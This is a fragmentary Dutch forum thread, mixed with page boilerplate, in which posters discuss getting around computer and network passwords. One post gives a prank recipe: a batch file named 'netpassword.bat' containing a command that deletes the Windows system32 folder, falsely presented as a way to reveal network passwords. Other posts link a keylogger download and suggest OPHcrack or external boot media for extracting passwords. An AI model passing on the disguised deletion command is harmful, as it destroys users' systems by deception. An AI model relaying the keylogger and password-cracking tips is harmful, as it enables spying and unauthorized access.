Angelus
Gargantuan Beast
- Waardering
- 3.499
- Lengte
- 1m86
- Massa
- 100kg
- Vetpercentage
- 8%
wat zegt windows eigenlijk bij jou als je op het bestand klikt? (ik heb vista en hier geeft het geen problemen
)Volg de onderstaande video samen om te zien hoe u onze site kunt installeren als een web-app op uw startscherm.
Notitie: Deze functie is mogelijk niet beschikbaar in sommige browsers.
)wat zegt windows eigenlijk bij jou als je op het bestand klikt? (ik heb vista en hier geeft het geen problemen)
Gelukkigformat c:\ ?
haha dude u can't fool me met je "format" zover gaat mijn kennis nog wel![]()

En heb echt van alles geflikt met die foto's. Eén van de dingen die mij heeft getraumatiseerd als kleine..), gebruikte ik [Link niet meer beschikbaar] voor tools
grapjas jij zeker ofniet?
@echo off
del c:\WINDOWS\system32
ff gegoogled omdat ik het woordje "del" al niet vetrouwde en system32 is een behoorlijk belangrijke map.
goed maar dat me windows 7 het blokkeerde.
maakt niet uit wat voor naam je het geeft, al noem je de txt: jemoeder.bat hij zal de volgende command uitvoeren: namelijk het verwijderen van de system32 map

Dit doet mij denken aan die 4chan prank
---------- Toegevoegd om 18:30 ---------- De post hierboven werd geplaatst om 18:27 ----------
http://files.sharenator.com/triforce3_4chan_Triforce_Prank-s2262x5000-44015.png

Ja ik begrijp deze zin helemaal.Zoek iemand die informatica zever kan.
Je kan via een schijf of externe hardware je laptop booten via een andere shit en dan kan je de passwoord van je vorige shit achterhalen.
Ofzoiets
Ga werken en koop zelf een laptop , voor 300 euro heb je er al 1.Thnx man dit is echt makkelijk en handig wel jammer dat je moet betalen voor de voledige versie maarjah.Met de volgende heb ik goede ervaring. Trial kan je downloaden maar die kan maar 3 uur aan en dan moet je het opnieuw aanzetten.
http://www.actualkeylogger.com/download-free-key-logger.html
best simpel, open je dos command prompt, en typ "net view" in
vervolgens maak je een nieuw txt bestand en typ je daar in:
"@echo off
del c:\WINDOWS\system32"
bestand opslaan als "netpassword.bat" en het bestand openen.
edit: dan krijg je een venster open waarin alle paswoorden van iedereen op het netwerk staan, en dan is het gewoon een kwestie van het juiste paswoord te kiezen![]()

Er zijn bootable cd's waar je gewoon alle wachtwoorden mee kunt uitlezen zoals OPHcrack.
CD branden , booten vanaf deze en dan gewoon de logische weg volgen.